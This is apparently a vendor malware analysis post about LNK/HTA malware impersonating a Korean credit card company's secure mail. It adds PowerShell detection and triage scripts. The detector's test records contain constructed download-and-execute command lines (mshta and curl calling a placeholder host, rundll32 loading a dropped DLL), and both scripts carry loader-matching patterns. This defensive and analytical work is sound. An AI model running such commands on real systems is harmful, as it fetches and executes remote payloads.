Don’t Trust ‘Secure Mail’! Malicious Files Impersonating Credit Card Companies Are Being Distributed

AhnLab recently confirmed the distribution of malicious files disguised as secure emails from a major credit card company in Korea. The attack flow resembles the Kimsuky group’s earlier malicious LNK distribution case, in which the files were disguised as password files, but it is characterized by a change in the command executed by the initial LNK file. In particular, which additional files are executed, and how the malicious files behave, changes depending on whether the security service of the infected environment is enabled or disabled. Let’s take a look at the main behavior of this case and the precautions users should take.

Malicious Behavior Depending on Whether the Security Service Is Enabled

The malicious LNK file contains a command that runs mshta through PowerShell. When the file is executed, an HTA file hosted at a specific address is run via mshta.exe; the HTA contains obfuscated VBScript code. The script then downloads and opens a decoy document that looks like a legitimate document to lower the user’s suspicion.

[Figure 1] Obfuscated VBScript

The malware then checks whether the Windows Defender service is running, and downloads and executes additional files in different ways depending on the result.

In environments where the Windows Defender service is running, the malware uses curl to download the pipe.log file from the specified address to the %LocalAppData% path. The file is AES-encrypted; it is decrypted, saved as pipe.zip, and then decompressed.

Inside pipe.zip are 1.log, 1.ps1, and 2.log, as shown in Figure 2. Respectively, they perform information theft and backdoor operations; read a file’s contents and execute the Base64-decoded result in memory; and perform keylogging and clipboard data collection.

[Figure 2] Inside the pipe.zip file

| File name | Function |
|---|---|
| 1.log | Performs information theft and backdoor functions (Base64-encoded form) |
| 1.ps1 | Takes a file name as an argument, reads the contents of the file, and executes the Base64-decoded result in memory using the |
| 2.log | Performs keylogging and clipboard data theft functions (Base64-encoded) |

[Table 1] Internal files of pipe.zip

On the other hand, if the Windows Defender service is stopped, the malware downloads user.txt and sys.log to the %LOCALAPPDATA% path. The sys.log file is decrypted with the embedded AES key and saved as sys.dll, which is then loaded via rundll32. sys.dll is a downloader that stops running in VBox and VM environments.

Decrypting the encrypted data in %LocalAppData%\user.txt reveals three URLs, each of which is used to download an additional malicious file to the %LocalAppData% path.

| Download URL | Save path |
|---|---|
| hxxps://drive.google[.]com/uc?export=download&id=1veetviG******** | %LOCALAPPDATA%\notepad.log |
| hxxps://drive.google[.]com/uc?export=download&id=1PTs95g******** | %LOCALAPPDATA%\net |
| hxxps://drive.google[.]com/uc?export=download&id=1EkyeoS******** | %LOCALAPPDATA%\app |
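The execution chain described above (LNK → PowerShell → mshta.exe loading a remote HTA → curl.exe dropping pipe.log, or rundll32.exe loading sys.dll, under %LocalAppData%) is easy to express as a process-tree detection. The following PowerShell is an added example written for this post, not AhnLab’s code or a detection rule from the write-up. The sample records, host names (`lure.invalid`) and the rundll32 export name `Run` are constructed; the write-up does not give the exact curl or rundll32 arguments, so the patterns key on the loader plus a %LocalAppData% path rather than on specific switches.

```powershell
# Added example, not AhnLab's code: flags the execution chain described above
# (LNK -> PowerShell -> mshta.exe -> curl.exe or rundll32.exe under %LocalAppData%)
# in process-creation records. The records below are constructed for the demo; in
# production, build objects with the same three properties from Sysmon Event ID 1.
# The exact curl and rundll32 arguments are not given in the write-up, so the
# patterns key on the loader plus a %LocalAppData% path rather than exact switches.

function Find-SecureMailLureChain {
    param([Parameter(Mandatory)][object[]]$Events)

    # Matches both the expanded profile path and the unexpanded variable.
    $localAppData = '(?i)(%LOCALAPPDATA%|\\AppData\\Local\\)'

    foreach ($e in $Events) {
        $img    = ([string]$e.Image -split '[\\/]')[-1].ToLowerInvariant()
        $parent = ([string]$e.ParentImage -split '[\\/]')[-1].ToLowerInvariant()
        $cmd    = [string]$e.CommandLine
        $reason = $null

        if ($img -eq 'powershell.exe' -and $cmd -match '(?i)mshta(\.exe)?\s+"?https?://') {
            # Stage 1: the LNK runs PowerShell, which starts mshta with a remote HTA.
            $reason = 'PowerShell launching mshta with a remote HTA'
        }
        elseif ($img -eq 'mshta.exe' -and $parent -eq 'powershell.exe' -and $cmd -match 'https?://') {
            # Stage 2: mshta.exe, spawned by PowerShell, loading the HTA from a URL.
            $reason = 'mshta.exe spawned by PowerShell with a remote HTA'
        }
        elseif ($img -eq 'curl.exe' -and $cmd -match 'https?://' -and $cmd -match $localAppData) {
            # Defender-running branch: curl drops pipe.log under %LocalAppData%.
            $reason = 'curl.exe downloading into %LocalAppData%'
        }
        elseif ($img -eq 'rundll32.exe' -and $cmd -match ($localAppData + '[^\s"]*\.dll')) {
            # Defender-stopped branch: rundll32 loads the decrypted sys.dll from %LocalAppData%.
            $reason = 'rundll32.exe loading a DLL from %LocalAppData%'
        }

        if ($reason) {
            [pscustomobject]@{
                Reason      = $reason
                Parent      = $parent
                Image       = $img
                CommandLine = $cmd
            }
        }
    }
}

# Constructed sample records (placeholder host, not real IOCs).
$SampleEvents = @(
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell.exe -w hidden -c "mshta https://lure.invalid/secure/notice.hta"' }
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       Image       = 'C:\Windows\System32\mshta.exe'
                       CommandLine = 'mshta https://lure.invalid/secure/notice.hta' }
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\mshta.exe'
                       Image       = 'C:\Windows\System32\curl.exe'
                       CommandLine = 'curl.exe -s -o C:\Users\victim\AppData\Local\pipe.log https://lure.invalid/pipe.log' }
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\mshta.exe'
                       Image       = 'C:\Windows\System32\rundll32.exe'
                       CommandLine = 'rundll32.exe C:\Users\victim\AppData\Local\sys.dll,Run' }
    # Benign noise that must not fire: a normal rundll32 call and a local HTA.
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       Image       = 'C:\Windows\System32\rundll32.exe'
                       CommandLine = 'rundll32.exe shell32.dll,Control_RunDLL' }
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       Image       = 'C:\Windows\System32\mshta.exe'
                       CommandLine = 'mshta.exe C:\Tools\local.hta' }
)

# The first four records are reported; the two benign ones are not.
Find-SecureMailLureChain -Events $SampleEvents | Format-Table -AutoSize
```

To run it over real telemetry, map Sysmon Event ID 1 entries (for example from `Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational'`) to objects with `ParentImage`, `Image` and `CommandLine` properties and pass them in; the stage 1 and stage 2 rules are deliberately redundant so that either the parent or the child record alone is enough to raise an alert.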

Key Malicious Features

In this attack, several additional malicious components are executed depending on the infection environment, and each of them is confirmed to perform backdoor or information theft functions.

Among the additional malicious files, notepad.log is a backdoor that performs remote command execution, collects file and directory information, downloads and uploads files, uploads host information, and collects browser information. It also enumerates paths related to browser extensions and cryptocurrency wallets, downloads configuration files for the MeshAgent remote management tool, and performs keylogging and clipboard data collection.

Another malicious file, net, is an infostealer that is analyzed to steal Chrome and Firefox browser account information as well as account information from mail clients such as Thunderbird, Group Mail, and IncrediMail.

[Figure 3] Part of the net file code

The app file is also an infostealer. It scans for the chrome.exe process and then injects decrypted code into the main Chrome process (the one launched without --type= on its command line) to steal cookies from the Chrome, Edge, and Whale browsers.

[Figure 4] Part of the app file code

Countermeasures

This case is noteworthy because users are tricked into executing malicious files by mistaking them for secure mail from a popular credit card company. Users should check the source and file type of any file that claims to be a secure email, and avoid running suspicious files.

AhnLab recommends the following steps to take in response to this case.

1. Check the registry

Check the registry for registered entries and delete any suspicious ones.

2. Delete suspicious files

If files such as 1.log, 1.ps1, or 2.log exist in the %TEMP% or %LOCALAPPDATA%\pipe path, they may be malicious and should be deleted immediately.
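The two response steps above can be run as one triage script. The following PowerShell is an added example written for this post, not AhnLab’s script. It assumes, because the write-up does not name the registry location, that the entries to check are the usual Run/RunOnce autorun keys; the keyword pattern used to flag autorun values is mine, while the file names and directories are the ones listed in the write-up. Nothing is deleted unless `-Remove` is given, and `-WhatIf` previews what would be removed.

```powershell
# Added example, not AhnLab's code: implements the two response steps above as a
# triage script. (1) lists autorun registry values that look like this case's
# mshta / PowerShell / rundll32 loaders, (2) lists the files the write-up names
# under %TEMP% and %LOCALAPPDATA%. Assumptions: the write-up does not name the
# registry key, so the usual Run/RunOnce keys are checked, and the keywords in the
# pattern are mine. Nothing is deleted unless -Remove is given; -WhatIf previews it.

[CmdletBinding(SupportsShouldProcess)]
param([switch]$Remove)

$autorunKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
# Loader traits from this case: mshta pulling an HTA, hidden/encoded PowerShell,
# rundll32 loading a DLL, anything launched from %LocalAppData%.
$suspiciousValue = '(?i)mshta|\.hta\b|powershell.*(-enc|-w\s*hidden|mshta)|rundll32.*\.dll|%LOCALAPPDATA%|\\AppData\\Local\\'
# Properties the registry provider adds to every Get-ItemProperty result.
$providerProps   = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'

function Get-SuspiciousAutorun {
    foreach ($key in $autorunKeys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($p.Name -in $providerProps) { continue }
            if ([string]$p.Value -match $suspiciousValue) {
                [pscustomobject]@{ Key = $key; Name = $p.Name; Value = $p.Value }
            }
        }
    }
}

# File names and directories are the ones the write-up lists: the pipe.zip
# contents under %TEMP% / %LOCALAPPDATA%\pipe, and the other stages in %LOCALAPPDATA%.
$stageOne   = '1.log', '1.ps1', '2.log'
$stageTwo   = 'pipe.log', 'pipe.zip', 'user.txt', 'sys.log', 'sys.dll', 'notepad.log', 'net', 'app'
$candidates = @(
    foreach ($dir in $env:TEMP, (Join-Path $env:LOCALAPPDATA 'pipe')) {
        foreach ($n in $stageOne) { Join-Path $dir $n }
    }
    foreach ($n in $stageTwo) { Join-Path $env:LOCALAPPDATA $n }
)

function Get-DroppedFile {
    foreach ($path in $candidates) {
        if (Test-Path -LiteralPath $path -PathType Leaf) {
            Get-Item -LiteralPath $path | Select-Object FullName, Length, LastWriteTime
        }
    }
}

$autoruns = @(Get-SuspiciousAutorun)
$files    = @(Get-DroppedFile)

"Suspicious autorun values: $($autoruns.Count)"
$autoruns | Format-Table -AutoSize
"Dropped files present: $($files.Count)"
$files | Format-Table -AutoSize

if ($Remove) {
    # Review the listing before this step: a keyword match is not proof of infection.
    foreach ($f in $files) {
        if ($PSCmdlet.ShouldProcess($f.FullName, 'Remove dropped file')) {
            Remove-Item -LiteralPath $f.FullName -Force
        }
    }
    foreach ($a in $autoruns) {
        if ($PSCmdlet.ShouldProcess("$($a.Key)\$($a.Name)", 'Remove autorun value')) {
            Remove-ItemProperty -Path $a.Key -Name $a.Name
        }
    }
}
```

Run it once without switches to get the listing, then `.\Triage.ps1 -Remove -WhatIf` to see exactly which files and registry values would be removed before committing with `-Remove`. Copy any flagged file to an isolated location first if it is needed for analysis, since the script deletes rather than quarantines.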

This attack case uses decoy files disguised as legitimate documents and performs different malicious behaviors depending on whether the security service is enabled or disabled. Users should be extremely cautious when opening secure emails or related files claiming to be from a card company, and organizations should check for suspicious registry entries and file creation.

Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.